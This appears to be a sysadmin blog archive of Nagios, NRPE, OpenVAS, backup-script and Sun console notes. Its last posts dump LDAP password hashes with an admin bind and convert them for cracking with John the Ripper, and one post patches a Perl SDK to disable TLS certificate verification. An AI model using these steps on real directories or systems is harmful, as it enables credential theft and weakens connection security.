Monday, December 12, 2016
netapp mibs changes or curse you snmp
i have a netapp.
the mibs are all new all the time since it is an enclosure.
i am using nagios.
my old nagios scripts do not work with my netapp.
here are some variables and here are some snmp oid changes:
FAN 1.3.6.1.4.1.789.1.21.1.2.1.18
PS 1.3.6.1.4.1.789.1.21.1.2.1.15
TEMP 1.3.6.1.4.1.789.1.21.1.2.1.27
thanks:
http://www.mibdepot.com/cgi-bin/getmib3.cgi?win=mib_a&r=netapp&f=netapp_2_2_2.mib&v=v2&t=tree
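the fix is mostly pointing the old checks at the new oids. a minimal sketch of the nagios side follows — the 1=ok status mapping, community string, and hostname are my assumptions for illustration, not from the netapp docs, so adjust to whatever the mib actually reports:

```shell
#!/bin/bash
# map a numeric enclosure status to a nagios exit code.
# ASSUMPTION: 1 means ok, 2 means degraded; adjust to the mib you actually have.
FAN_OID=1.3.6.1.4.1.789.1.21.1.2.1.18

status_to_nagios() {
  case "$1" in
    1) echo "OK - enclosure reports $1"; return 0 ;;
    2) echo "WARNING - enclosure reports $1"; return 1 ;;
    *) echo "CRITICAL - enclosure reports $1"; return 2 ;;
  esac
}

# the real check would be something like (host and community are placeholders):
# val=$(snmpget -v2c -c public -Ovq netapp.example.com "$FAN_OID")
# status_to_nagios "$val"
```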
Thursday, December 8, 2016
openvas is having a bad day on debian 8.2
i am seeing:
Operation: Start Task
Status code: 503
Status message: Service temporarily down
and to make things worse:
lib serv:WARNING:2016-12-07 10h00.00 UTC:4546: Failed to shake hands with peer:
The TLS connection was non-properly terminated.
lib serv:WARNING:2016-12-07 10h00.00 UTC:4546: Failed to shutdown server socket
event task:MESSAGE:2016-12-07 10h00.00 UTC:4546: Task could not be started by admin
great.
that means my certs are out of date. guess i need to update them.
# systemctl stop openvas-scanner
# systemctl stop openvas-manager
# openvas-mkcert -f
# openvas-mkcert-client -i -n
# openvasmd --get-scanners
08b69003-5fc2-4037-a479-93b440211c73 OpenVAS Default <- unique to each install
# ls -la /usr/local/var/lib/openvas/private/CA/
yes. that's where the keys are located.
# openvasmd --modify-scanner "08b69003-5fc2-4037-a479-93b440211c73" \
--scanner-ca-pub /usr/local/var/lib/openvas/CA/cacert.pem \
--scanner-key-pub /usr/local/var/lib/openvas/CA/clientcert.pem \
--scanner-key-priv /usr/local/var/lib/openvas/private/CA/clientkey.pem
# openvas-nvt-sync
# openvasmd --rebuild
# systemctl start openvas-manager
# systemctl start gsa
done
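next time i'd rather get a warning before the handshake breaks. a small sketch that checks a pem cert's remaining lifetime with openssl; the openvas path in the comment assumes a /usr/local install prefix like mine:

```shell
#!/bin/bash
# warn when a pem certificate is within N days of expiry.
check_cert_expiry() {
  local pem=$1 days=${2:-30}
  if openssl x509 -checkend $(( days * 86400 )) -noout -in "$pem" >/dev/null; then
    echo "OK: $pem good for at least $days days"
  else
    echo "RENEW: $pem expires within $days days"
    return 1
  fi
}

# e.g. (path assumes a /usr/local prefix like mine):
# check_cert_expiry /usr/local/var/lib/openvas/CA/cacert.pem
```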
Thursday, December 1, 2016
backup /etc on ubuntu 12.04
because i need /etc .
etc_backup.sh
#!/bin/bash
# Script to backup the /etc hierarchy
#
# Written 4/2002 by Wayne Pollock, Tampa Florida USA
#
# $Id: backup-etc,v 1.6 2004/08/25 01:42:26 wpollock Exp $
#
# $Log: backup-etc,v $
#
# Revision 1.6 2004/08/25 01:42:26 wpollock
# Changed backup name to include the hostname and 4 digit years.
#
# Revision 1.5 2004/01/07 18:07:33 wpollock
# Fixed dots routine to count files first, then calculate files per dot.
#
# Revision 1.4 2003/04/03 08:10:12 wpollock
# Changed how the version number is obtained, so the file
# can be checked out normally.
#
# Revision 1.3 2003/04/03 08:01:25 wpollock
# Added ultra-fancy dots function for verbose mode.
#
# Revision 1.2 2003/04/01 15:03:33 wpollock
# Eliminated the use of find, and discovered that tar was working
# as intended all along! (Each directory that find found was
# recursively backed-up, so for example /etc, then /etc/mail,
# caused /etc/mail/sendmail.mc to be backuped three times.)
#
# Revision 1.1 2003/03/23 18:57:29 wpollock
# Modified by Wayne Pollock:
#
# Discovered not all files were being backed up, so
# added "-print0 --force-local" to find and "--null -T -"
# to tar (eliminating xargs), to fix the problem when filenames
# contain metacharacters such as whitespace.
# Although this now seems to work, the current version of tar
# seems to have a bug causing it to backup every file two or
# three times when using these options! This is still better
# than not backing up some files at all.)
#
# Changed the logger level from "warning" to "error".
#
# Added '-v, --verbose' options to display dots every 60 files,
# just to give feedback to a user.
#
# Added '-V, --version' and '-h, --help' options.
#
# Removed the lock file mechanism and backup file renaming
# (from foo to foo.1), in favor of just including a time-stamp
# of the form "yymmdd-hhmm" to the filename.
#
PATH=/bin:/usr/bin
REPOSITORY=/opt/etc_backups/
TIMESTAMP=$(date '+%Y%m%d')
HOSTNAME=$(hostname -s)
FILE="$REPOSITORY/$HOSTNAME-$TIMESTAMP.tgz"
ERRMSGS=/tmp/backup-etc.$$
PROG=${0##*/}
VERSION=$(echo $Revision: 1.6 $ |awk '{print$2}')
VERBOSE=off
usage()
{ echo "This script creates a full backup of /etc via tar in $REPOSITORY."
echo "Usage: $PROG [OPTIONS]"
echo ' Options:'
echo ' -v, --verbose displays some feedback (dots) during backup'
echo ' -h, --help displays this message'
echo ' -V, --version display program version and author info'
echo
}
dots()
{ MAX_DOTS=50
NUM_FILES=`find /etc|wc -l`
let 'FILES_PER_DOT = NUM_FILES / MAX_DOTS'
bold=`tput smso`
norm=`tput rmso`
tput sc
tput civis
echo -n "$bold(00%)$norm"
while read; do
let "cnt = (cnt + 1) % FILES_PER_DOT"
if [ "$cnt" -eq 0 ]
then
let '++num_dots'
let 'percent = (100 * num_dots) / MAX_DOTS'
[ "$percent" -gt "100" ] && percent=100
tput rc
printf "$bold(%02d%%)$norm" "$percent"
tput smir
echo -n "."
tput rmir
fi
done
tput cnorm
echo
}
# Command line argument processing:
while [ $# -gt 0 ]
do
case "$1" in
-v|--verbose) VERBOSE=on; ;;
-h|--help) usage; exit 0; ;;
-V|--version) echo -n "$PROG version $VERSION "
echo 'Written by Wayne Pollock <pollock@acm.org>'
exit 0; ;;
*) usage; exit 1; ;;
esac
shift
done
trap "rm -f $ERRMSGS" EXIT
cd /etc
# create backup, saving any error messages:
if [ "$VERBOSE" != "on" ]
then
tar -cz --force-local -f $FILE . 2> $ERRMSGS
else
tar -czv --force-local -f $FILE . 2> $ERRMSGS | dots
fi
# Log any error messages produced:
if [ -s "$ERRMSGS" ]
then logger -p user.error -t $PROG "$(cat $ERRMSGS)"
else logger -t $PROG "Completed full backup of /etc"
fi
exit 0
i have it running in system cron. prior to it executing, i have dpkg run to output installed packages... this helps with system restore, if
needed.
50 22 * * * root /usr/bin/dpkg --get-selections > /etc/package-list.txt
00 23 * * * root /usr/local/scripts/etc_backup.sh
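a backup nobody has tested is just a wish. a quick sketch to verify the newest tarball actually lists; the *.tgz filename pattern and default repository path match etc_backup.sh above:

```shell
#!/bin/bash
# sanity-check the newest /etc backup: does the tarball actually list?
verify_latest() {
  local repo=${1:-/opt/etc_backups}
  local latest
  latest=$(ls -1t "$repo"/*.tgz 2>/dev/null | head -1)
  [ -n "$latest" ] || { echo "no backups found in $repo"; return 2; }
  if tar -tzf "$latest" >/dev/null 2>&1; then
    echo "OK: $latest lists cleanly"
  else
    echo "BAD: $latest did not list"
    return 1
  fi
}
```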
bash scripts to backup svn server
there is nothing nearer and dearer to my heart than my svn server. if i lost it i would be unhappy for a very long time.
i have a bunch of scripts here:
/nfsmount/bin
why? because if i lost my nfs mounts, my scripts would not work and i would not have to deal with my fs filling up.
yes, i could check for the mount being active, but why bother? i like keeping all my eggs in one basket.
svn_backup.sh
#!/bin/bash
# set values
repos=( repo1 repo2 repo3 )
rpath=/var/svn/repositories
opath=/nfsmount/svn
tpath=/tmp/svn
suffix=$(date +%Y-%m-%d)
#check if we need to make output path
if [ -d $opath ]
then
# directory exists, we are good to continue
filler="just some action to prevent syntax error"
else
#we need to make the directory
echo Creating $opath
mkdir -p $opath
fi
# remove contents of tmp
rm -rf $tpath
mkdir -p $tpath
for (( i = 0 ; i < ${#repos[@]} ; i++ ))
do
svnadmin hotcopy $rpath/${repos[$i]} ${tpath}/${repos[$i]}_$suffix.hotcopy
#now compress them, capturing any errors for the check below
tar -czf ${opath}/${repos[$i]}_$suffix.hotcopy.tar.gz -C ${tpath}/${repos[$i]}_$suffix.hotcopy . 2> error
if [ -s error ]
then
printf "WARNING: An error occurred while attempting to backup %s \n\tError:\n\t" ${repos[$i]}
cat error
rm -f error
else
printf "%s was backed up successfully \n\n" ${repos[$i]}
fi
done
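side note: the c-style index loop works, but bash can walk the array directly, which is harder to get wrong. the same hotcopy loop sketched in that style (the svnadmin call is left commented since it needs a live repo):

```shell
#!/bin/bash
repos=( repo1 repo2 repo3 )
suffix=$(date +%Y-%m-%d)

# iterate the array directly instead of by index
for repo in "${repos[@]}"; do
  echo "would hotcopy $repo -> ${repo}_${suffix}.hotcopy"
  # svnadmin hotcopy /var/svn/repositories/"$repo" /tmp/svn/"${repo}"_"$suffix".hotcopy
done
```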
let's backup the individual hooks and conf directories. and apache conf, too. hotcopy will backup db, and that's about it.
we need confs. hooks. and stuff. logs meh.
the svn server has the following layout:
> hookscripts
mailer.conf
no-archives.py
post-commit
pre-commit
pre-revprop-change
readme.txt
svnperms.conf
svnperms.py
> logs
commit-email.log
repo-pre-commit
svn_logfile
> repositories
> repo
> conf
> dav
> db
> format
> hooks
> locks
svn_apacheconf_backup.sh
#!/bin/bash
# set values
apacheconf=( /etc/apache2 )
svnconf=( /var/svn/hookscripts )
repos=( repo1 repo2 repo3 )
confdirs=( conf hooks )
rpath=/var/svn/repositories
opath=/nfsmount/svn
suffix=$(date +%Y-%m-%d)
#check if we need to make path
if [ -d $opath ]
then
# directory exists, we are good to continue
filler="just some action to prevent syntax error"
else
#we need to make the directory
echo Creating $opath
mkdir -p $opath
fi
#now do the apache backup
APACHECONFDUMP=${opath}/apacheconf_$suffix.tar.gz
tar -zcvf $APACHECONFDUMP $apacheconf 2> error
if [ -s error ]
then
printf "WARNING: An error occurred while attempting to backup %s \n\tError:\n\t" $apacheconf
cat error
rm -f error
else
printf "%s was backed up successfully \n\n" $APACHECONFDUMP
fi
#now do the svn conf backup
SVNCONFDUMP=${opath}/svnconf_$suffix.tar.gz
tar -zcvf $SVNCONFDUMP $svnconf 2> error
if [ -s error ]
then
printf "WARNING: An error occurred while attempting to backup %s \n\tError:\n\t" $svnconf
cat error
rm -f error
else
printf "%s was backed up successfully \n\n" $SVNCONFDUMP
fi
#now to do the config backups
for (( i = 0; i < ${#repos[@]} ; i++ ))
do
for (( j = 0 ; j < ${#confdirs[@]} ; j++ ))
do
CONFDUMP=${opath}/${repos[i]}_${confdirs[j]}_$suffix.tar.gz
CONFDIR=${rpath}/${repos[i]}/${confdirs[j]}
tar -zcvf $CONFDUMP $CONFDIR 2> error
if [ -s error ]
then
printf "WARNING: An error occurred while attempting to backup %s \n\tError:\n\t" $CONFDIR
cat error
rm -f error
else
printf "%s was backed up successfully \n\n" $CONFDUMP
fi
done
done
let's purge our old backups. i keep a week of them.
svn_purgebackups.sh
#!/bin/bash
#this script will run through all nested directories of a parent just killing off all matching files.
######
### Set these values
######
## default days to retain (override with .RETAIN_RULE in a specific directory)
DEFRETAIN=7
#want to append the activity to a log? good idea, add its location here
LOGFILE=/nfsmount/svn/removed.log
# enter the distinguishing extension, or portion of the filename here (eg. log, txt, etc.)
EXTENSION=gz
#the absolute path of folder to begin purging
#this is the top most directory to begin the attack; all sub directories containing only lowercase letters and periods are fair game.
DIRECTORY=/nfsmount/svn
#####
## End user configuration
#####
#this note will remind you that you have a log in case you're getting emails from a cron job or something
echo see $LOGFILE for details
#jump to working directory
cd $DIRECTORY
#if your sub-dirs have some crazy characters you may adjust this regex
DIRS=`ls | grep '^[a-z.]*$'`
TODAY=`date`
printf "\n\n********************************************\n\tSVN Purge Log for:\n\t" | tee -a $LOGFILE
echo $TODAY | tee -a $LOGFILE
printf "********************************************\n" | tee -a $LOGFILE
for DIR in $DIRS
do
pushd $DIR >/dev/null
HERE=`pwd`
printf "\n\n%s\n" $HERE | tee -a $LOGFILE
if [ -f .RETAIN_RULE ]
then
printf "\tdefault Retain period being overridden\n" | tee -a $LOGFILE
read RETAIN < .RETAIN_RULE
else
RETAIN=$DEFRETAIN
fi
printf "\tpurging files older than %s days\n" ${RETAIN} | tee -a $LOGFILE
OLDFILES=`find -mtime +${RETAIN} -regex ".*${EXTENSION}.*"`
set -- $OLDFILES
if [ -z $1 ]
then
printf "\tNo files matching purge criteria\n" | tee -a $LOGFILE
else
printf "\tDump Files being deleted from $HERE\n" | tee -a $LOGFILE
printf "\t\t%s\n" $OLDFILES | tee -a $LOGFILE
fi
rm -f $OLDFILES
if [ $? -ne 0 ]
then
echo "Error while deleting last set" | tee -a $LOGFILE
exit 2
else
printf "\tSuccess\n" | tee -a $LOGFILE
fi
popd >/dev/null
done
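the retention logic boils down to find -mtime +N. a self-contained sketch of just that part, run against a scratch directory instead of /nfsmount/svn:

```shell
#!/bin/bash
# delete *.gz files older than RETAIN days under a directory.
purge_old() {
  local dir=$1 retain=${2:-7}
  find "$dir" -mtime +"$retain" -name '*.gz' -print -delete
}

# demo against a scratch dir: one stale file, one fresh one
demo=$(mktemp -d)
touch -d '10 days ago' "$demo/old_backup.tar.gz"
touch "$demo/new_backup.tar.gz"
purge_old "$demo" 7
```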
in priv user crontab, i have these entries:
15 0 * * * /nfsmount/bin/svn_backup.sh | mail -s "svn hotcopy report" me@there.com 2>&1
25 0 * * * /nfsmount/bin/svn_apacheconf_backup.sh | mail -s "svn apacheconf report" me@there.com 2>&1
45 1 * * * /nfsmount/bin/svn_purgebackups.sh | mail -s "purge archive report" me@there.com 2>&1
Wednesday, November 30, 2016
compile and install nagios nrpe 2.15 on ubuntu 12.04 lts
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.3 LTS"
download and install gz'd code in /usr/local/src
add nagios user
# useradd -c "nagios system user" -d /usr/local/nagios -m nagios
# groupadd nagios
# chown nagios:nagios /usr/local/nagios
compile and install nrpe
# gunzip nrpe-2.15.tar.gz
# tar xvf nrpe-2.15.tar
# cd nrpe-2.15
# ./configure --with-ssl=/usr/bin/openssl --with-ssl-lib=/usr/lib/x86_64-linux-gnu
# make && make install
/usr/bin/install -c -m 775 -o nagios -g nagios -d /usr/local/nagios/bin
/usr/bin/install -c -m 775 -o nagios -g nagios nrpe /usr/local/nagios/bin
# make install-daemon-config
/usr/bin/install -c -m 775 -o nagios -g nagios -d /usr/local/nagios/etc
/usr/bin/install -c -m 644 -o nagios -g nagios sample-config/nrpe.cfg /usr/local/nagios/etc
# gunzip nagios-plugins-1.4.16.tar.gz
# tar xvf nagios-plugins-1.4.16.tar
# cd nagios-plugins-1.4.16/
# ./configure --without-mysql
# make && make install
...
* note
i'm hardcoding the libs for nrpe because
configure does this...
checking for type of socket size... size_t
checking for SSL headers... SSL headers found in /usr
checking for SSL libraries... configure: error: Cannot find ssl libraries
meh
# apt-get install libssl-dev
# ldconfig
# apt-file search libssl | grep libssl-dev
...
set up the nrpe daemon
# echo 'nrpe 5666/tcp # NRPE' >> /etc/services
# cp /usr/local/src/nrpe-2.15/init-script.debian /etc/init.d/nrpe
# chmod +x /etc/init.d/nrpe
# sysv-rc-conf
set to runlevels 2 3 4 5
q to exit :^)
edit nrpe.cfg to site specs
# vi /usr/local/nagios/etc/nrpe.cfg
run nrpe daemon
# /etc/init.d/nrpe start
running?
# netstat -an |grep 5666
tcp 0 0 0.0.0.0:5666 0.0.0.0:* LISTEN
tcp6 0 0 :::5666 :::* LISTEN
check if nrpe is accessible. the rev should show up.
# /usr/local/nagios/libexec/check_nrpe -H localhost
NRPE v2.15
make it easy on yourself with a script as opposed to copy/paste.
useradd -c "nagios system user" -d /usr/local/nagios -m nagios ;
chown nagios:nagios /usr/local/nagios ;
mkdir -p /usr/local/src ;
cd /usr/local/src ;
scp you@somewhere:/dir/nrpe-2.15.tar.gz . ;
scp you@somewhere:/dir/nagios-plugins-1.4.16.tar.gz . ;
scp you@somewhere:/dir/templates/* . ;
gunzip nrpe-2.15.tar.gz ;
tar xvf nrpe-2.15.tar ;
gunzip nagios-plugins-1.4.16.tar.gz ;
tar xvf nagios-plugins-1.4.16.tar ;
cd nrpe-2.15 ;
./configure --with-ssl=/usr/bin/openssl --with-ssl-lib=/usr/lib/x86_64-linux-gnu ;
make && make install ;
make install-daemon-config ;
cd ../nagios-plugins-1.4.16 ;
./configure --without-mysql ;
make && make install ;
cp /usr/local/src/nrpe.cfg /usr/local/nagios/etc/ ;
echo 'nrpe 5666/tcp # NRPE' >> /etc/services ;
cp /usr/local/src/nrpe-2.15/init-script.debian /etc/init.d/nrpe ;
chmod +x /etc/init.d/nrpe
common prereqs:
libssl-dev
apt-file
sysv-rc-conf
note:
if you see the make error in the nrpe section (make will not tell you, you have to watch the process):
./nrpe.c:269: undefined reference to `get_dh512'
a hint is when you run /etc/init.d/nrpe and do not see the output:
Starting nagios remote plugin daemon: nrpe.
regenerate dh.h from the C-code output of openssl, if openssl is installed:
# openssl dhparam -C 512 > /usr/local/src/nrpe-2.15/include/dh.h
then remove everything between (and including):
-----BEGIN DH PARAMETERS-----
-----END DH PARAMETERS-----
if running openssl comes up as not found,
apt-get install openssl
for ubuntu 10 and lower:
--with-ssl=/usr/bin/openssl --with-ssl-lib=/usr/lib
if you do not want to roll your own:
apt-get install nagios-nrpe-server
apt-get install nagios-plugins
apt-get install nagios-plugins-basic
apt-get install nagios-plugins-standard
all the conf stuff resides in:
/etc/nagios
...
a basic-o-rama template (nrpe.cfg):
#############################################################################
# NRPE Config File
#
# Last Modified: TODAY!
#############################################################################
# LOG FACILITY
log_facility=daemon
# PID FILE
pid_file=/var/run/nrpe.pid
# PORT NUMBER
server_port=5666
# SERVER ADDRESS
#server_address=127.0.0.1
# NRPE USER
nrpe_user=nagios
# NRPE GROUP
nrpe_group=nagios
# ALLOWED HOST ADDRESSES
# NOTE: This option is ignored if NRPE is running under either inetd or xinetd
# localhost and monitoring servers
allowed_hosts=127.0.0.1,128.6.6.6,10.5.5.5
# COMMAND ARGUMENT PROCESSING
dont_blame_nrpe=0
# BASH COMMAND SUBSTITUTION
allow_bash_command_substitution=0
# DEBUGGING OPTION
# Values: 0=debugging off, 1=debugging on
debug=0
# COMMAND TIMEOUT
command_timeout=60
# COMMAND DEFINITIONS
# The following examples use hardcoded command arguments...
command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10
command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20
command[check_root]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /
command[check_zombie_procs]=/usr/local/nagios/libexec/check_procs -w 5 -c 10 -s Z
command[check_total_procs]=/usr/local/nagios/libexec/check_procs -w 600 -c 900
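every command definition above follows the same plugin contract: print one status line, exit 0/1/2/3. a toy sketch of that contract for a percentage-style check (thresholds are examples, not nagios defaults):

```shell
#!/bin/bash
# nagios plugin exit contract: 0=OK 1=WARNING 2=CRITICAL 3=UNKNOWN
check_pct() {
  local value=$1 warn=$2 crit=$3
  case "$value" in ''|*[!0-9]*) echo "UNKNOWN - bad value"; return 3 ;; esac
  if [ "$value" -ge "$crit" ]; then echo "CRITICAL - ${value}%"; return 2
  elif [ "$value" -ge "$warn" ]; then echo "WARNING - ${value}%"; return 1
  else echo "OK - ${value}%"; return 0
  fi
}

# e.g. usage at 85% with warn 80 / crit 90 comes back WARNING, exit 1
```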
Tuesday, November 29, 2016
check_vmware_api.pl install is perl hell
Prerequisites:
- Ubuntu 14.04 Server (perl v5.18.2)
- VMware-vSphere-Perl-SDK-5.5.0-2043780
- check_vmware_api.pl 0.7.1
Basic installation:
apt-get install perl-doc libssl-dev libxml-libxml-perl libarchive-zip-perl libcrypt-ssleay-perl libclass-methodmaker-perl libuuid-perl libdata-dump-perl libsoap-lite-perl libio-compress-perl
tar -xf VMware-vSphere-Perl-SDK-5.5.0-2043780.x86_64.tar.gz -C /tmp
cd /tmp/vmware-vsphere-cli-distrib
./vmware-install.pl
...
cpan[3]> i /libwww-perl/
Distribution GAAS/libwww-perl-5.837.tar.gz
Distribution GAAS/libwww-perl-6.01.tar.gz
Distribution GAAS/libwww-perl-6.05.tar.gz
Author LWWWP ("The libwww-perl mailing list" <libwww@perl.org>)
4 items found
cpan[4]> install GAAS/libwww-perl-5.837.tar.gz
Running make for G/GA/GAAS/libwww-perl-5.837.tar.gz
Checksum for /root/.cpan/sources/authors/id/G/GA/GAAS/libwww-perl-5.837.tar.gz ok
...
http://search.cpan.org/dist/Nagios-Plugin/lib/Nagios/Plugin.pm
Nagios::Monitoring::Plugin
Nagios::Plugin <- no longer
...
Work around for "Server version unavailable":
patch -b /usr/share/perl/5.14/VMware/VICommon.pm
...
my $user_agent = LWP::UserAgent->new(agent => "VI Perl");
+ $user_agent->ssl_opts( SSL_verify_mode => 0 );
my $cookie_jar = HTTP::Cookies->new(ignore_discard => 1);
$user_agent->cookie_jar($cookie_jar);
$user_agent->protocols_allowed(['http', 'https']);
@@ -502,7 +503,7 @@
sub query_server_version {
BEGIN {
#To remove SSL Warning, switching from IO::Socket::SSL to Net::SSL
- $ENV{PERL_NET_HTTPS_SSL_SOCKET_CLASS} = "Net::SSL";
+ #$ENV{PERL_NET_HTTPS_SSL_SOCKET_CLASS} = "Net::SSL";
#To remove host verification
$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME} = 0;
}
@@ -526,6 +527,7 @@
}
}
my $user_agent = LWP::UserAgent->new(agent => "VI Perl");
+ $user_agent->ssl_opts( SSL_verify_mode => 0 );
my $cookie_jar = HTTP::Cookies->new(ignore_discard => 1);
$user_agent->cookie_jar($cookie_jar);
$user_agent->protocols_allowed(['http', 'https']);
@@ -2108,6 +2110,7 @@
sub new {
my ($class, $url) = @_;
my $user_agent = LWP::UserAgent->new(agent => "VI Perl");
+ $user_agent->ssl_opts( SSL_verify_mode => 0 );
my $cookie_jar = HTTP::Cookies->new(ignore_discard => 1);
$user_agent->cookie_jar( $cookie_jar );
$user_agent->protocols_allowed( ['http', 'https'] );
*****************************************************************
...
env -i perl -V
@INC is yucky.
command execution via _compile function in Maketext.pm
Built under linux
Compiled at Feb 4 2014 23:11:19
@INC:
/etc/perl
/usr/local/lib/perl/5.14.2
/usr/local/share/perl/5.14.2
/usr/lib/perl5
/usr/share/perl5
/usr/lib/perl/5.14
/usr/share/perl/5.14
/usr/local/lib/site_perl
All my new stuff is under /usr/local/lib/perl5/
and not /usr/local/lib/site_perl oh come on.
because
Can't locate Monitoring/Plugin/Functions.pm
find / | grep -i Functions.pm <- in 5.18.0
ln -s /usr/local/lib/perl5/site_perl/5.18.0 site_perl
because
Can't locate Params/Validate.pm
find / | grep -i Validate.pm <- in 5.24.0
cd /usr/local/lib/site_perl/Params
ln -s /usr/local/lib/perl5/site_perl/5.24.0/x86_64-linux/Params/Validate .
ln -s /usr/local/lib/perl5/site_perl/5.24.0/x86_64-linux/Params/Validate.pm .
ln -s /usr/local/lib/perl5/site_perl/5.24.0/x86_64-linux/Params/ValidatePP.pm .
ln -s /usr/local/lib/perl5/site_perl/5.24.0/x86_64-linux/Params/ValidateXS.pm .
Wednesday, November 16, 2016
setting a static address in alom
for whatever reason my alom network settings were not picking up dhcp.
that's okay. let's set a static address.
many sun servers, by the way, do not have scadm in the platform directory...
yeah. try it:
/usr/platform/`uname -i`/sbin/scadm
get to a service console via a serial connection, logon and issue:
setsc netsc_dhcp false
setsc netsc_ipaddr <ip address>
setsc netsc_ipnetmask <subnet mask>
setsc netsc_ipgateway <gateway address>
shownetwork <- is useless until you have issued resetsc -y
reset the alom to effect settings:
resetsc -y
Wednesday, November 9, 2016
ilom i heart you
i heart you when the solaris system doesn't autoboot
-> start /SYS
-> start /SP/console
do evil much evil
#.
Wednesday, November 2, 2016
compile and install nagios nrpe 2.15 on solaris 10 sparc
# useradd -c "nagios system user" -d /usr/local/nagios -m nagios
# groupadd nagios
add nagios user to nagios group
# chown nagios:nagios /usr/local/nagios/
# cd /usr/local/src
# wget http://downloads.sourceforge.net/project/nagios/nrpe-2.x/nrpe-2.15/nrpe-2.15.tar.gz
# wget --no-check-certificate https://nagios-plugins.org/download/nagios-plugins-1.4.11.tar.gz
compile and install nrpe
# gunzip nrpe-2.15.tar.gz
# tar xvf nrpe-2.15.tar
# cd nrpe-2.15
# ./configure
# make && make install
# make install-daemon-config
compile and install plugins
# gunzip nagios-plugins-1.4.11.tar.gz
# tar xvf nagios-plugins-1.4.11.tar
# cd nagios-plugins-1.4.11
# ./configure --without-mysql
# make && make install
set up nrpe
# echo 'nrpe 5666/tcp # NRPE' >> /etc/services
in /etc/inetd.conf add:
nrpe stream tcp nowait nagios /usr/sfw/sbin/tcpd /usr/local/nagios/bin/nrpe -c /usr/local/nagios/etc/nrpe.cfg -i
convert inetd to smf
# inetconv
nrpe -> /var/svc/manifest/network/nrpe-tcp.xml
Importing nrpe-tcp.xml …Done
did it work?
# inetconv -e
svc:/network/nrpe/tcp:default enabled
online?
# svcs svc:/network/nrpe/tcp:default
STATE STIME FMRI
online 15:49:55 svc:/network/nrpe/tcp:default
# netstat -a | grep nrpe
*.nrpe *.* 0 0 49152 0 LISTEN
look at nrpe.cfg on the client
first, add the host and the servers that may access it.
restart the service
# svcadm disable svc:/network/nrpe/tcp:default
# svcadm enable svc:/network/nrpe/tcp:default
check if nrpe is accessible. the rev should show up.
# /usr/local/nagios/libexec/check_nrpe -H localhost
NRPE v2.15
problems?
# ldd /usr/local/nagios/bin/nrpe <- missing libs?
# less /var/svc/log/network-nrpe:default.log <- logs
and then on the nagios server itself, match the
services with what is defined in npre.cfg
solaris nrpe plugins look like:
command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10
command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20
command[check_hda1]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /
command[check_zombie_procs]=/usr/local/nagios/libexec/check_procs -w 5 -c 10 -s Z
command[check_total_procs]=/usr/local/nagios/libexec/check_procs -w 150 -c 200
note: check_hda1. usually / is defined as /dev/hda1 ; this does not match
the entry in /etc/vfstab . if the system is a global root zone hosting zones,
check_procs will need to be edited. change it to something insane like
100 for every zone. it is 150 200, by default.
define service {
host_name sparc01
service_description Root Partition
check_command check_nrpe!check_hda1
use generic-service
}
define service {
host_name sparc01
service_description Current Users
check_command check_nrpe!check_users
use generic-service
}
define service {
host_name sparc01
service_description CPU Load
check_command check_nrpe!check_load
use generic-service
}
define service {
host_name sparc01
service_description Total Processes
check_command check_nrpe!check_total_procs
use generic-service
}
define service {
host_name sparc01
service_description Zombie Processes
check_command check_nrpe!check_zombie_procs
use generic-service
}
high contrast happened
i walked away from my terminal. evil happened.
evil no more!
rundll32.exe %SystemRoot%\system32\shell32.dll,Control_RunDLL %SystemRoot%\system32\desk.cpl desk,@Themes /Action:OpenTheme /file:"C:\Windows\Resources\Ease of Access Themes\classic.theme"
Monday, October 31, 2016
LDAP crypt password extraction
but.
if your passwords are crypt...
ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w badpassword \
-h ldap.my.pants.com -b "dc=my,dc=pants,dc=com" \
-LLL -v "" uid userPassword \
| ldap2pw > ldap.pw
....
#! /usr/bin/perl -w
use strict;
use MIME::Base64;
while( <> && ! eof) { # need eof since we will hit eof on the other <>
 chomp;
my( $uid, $passw, $cn, $dn );
$cn = $uid = '';
while( <> ) { # get an object
chomp;
last if /^\s*$/; # objects have blank lines between them
if( /^cn: (.+)/ ) {
$cn = $1;
} elsif( /^dn: (.+)/ ) {
$dn = $1;
} elsif( /^userP\w+:: (.+)/) {
$passw = substr( decode_base64($1), 7); # assuming {crypt}
} elsif( /^uid: (.+)/) {
$uid = $1;
}
}
print "$uid\:$passw\n" if defined $passw; # only output if object has password
}
...
fun.
LDAP base64 conversion for cracking
ldif and ldap password extraction
when you extract passwords from ldap, they're salted.
you need to convert them to their hashes.
why? well. because of RFC2307
userpasswordvalue = cleartext-password / prefix b64-hashandsalt
prefix = "{" scheme "}"
scheme = %x30-39 / %x41-5A / %x61-7a / %x2D-2F / %x5F
;0-9, A-Z, a-z, "-", ".", "/", or "_"
b64-hashandsalt = <base64 of hashandsalt>
hashandsalt = password-hash salt
password-hash = <digest of cleartext-password salt>
cleartext-password = %x00-FF
salt = %x00-FF
yes. that.
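to make that concrete, here's a sketch that builds an {SSHA} value from a throwaway password and splits it back into hash and salt (the password and salt below are invented for the demo):

```shell
#!/bin/bash
# rfc 2307 {SSHA}: base64( sha1(password + salt) + salt )
make_ssha() {
  local pw=$1 salt=$2
  printf '{SSHA}%s' "$( { printf '%s%s' "$pw" "$salt" | openssl dgst -sha1 -binary; printf '%s' "$salt"; } | base64 )"
}

# sha1 digests are 20 bytes, so everything after byte 20 is the salt
ssha_salt() {
  printf '%s' "${1#\{SSHA\}}" | base64 -d | tail -c +21
}
```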
in a previous post i've already mentioned how to extract uids
and passwords into a nice long list for jtr...
you'll need python and the script below which will convert the list
line by line. it'll work for base64 passwords:
MD5, SHA, SHA1, SSHA, SHA256, SSHA256, &c.
first, do some text preparation:
# cut -d ":" -f1 userpassword.out > userpassword.left
# cut -d ":" -f2 userpassword.out > userpassword.base64
..................
#!/usr/bin/python
# base64tohex.py
import binascii
import base64
import sys
f=open(sys.argv[1],"r")
#read in lines - and decode
for x in f.xreadlines():
x=x.rstrip('\n')
try:
print binascii.hexlify(base64.b64decode(x))
except:
print "Error: "+x
..................
# ./base64tohex.py userpassword.base64 > userpassword.right
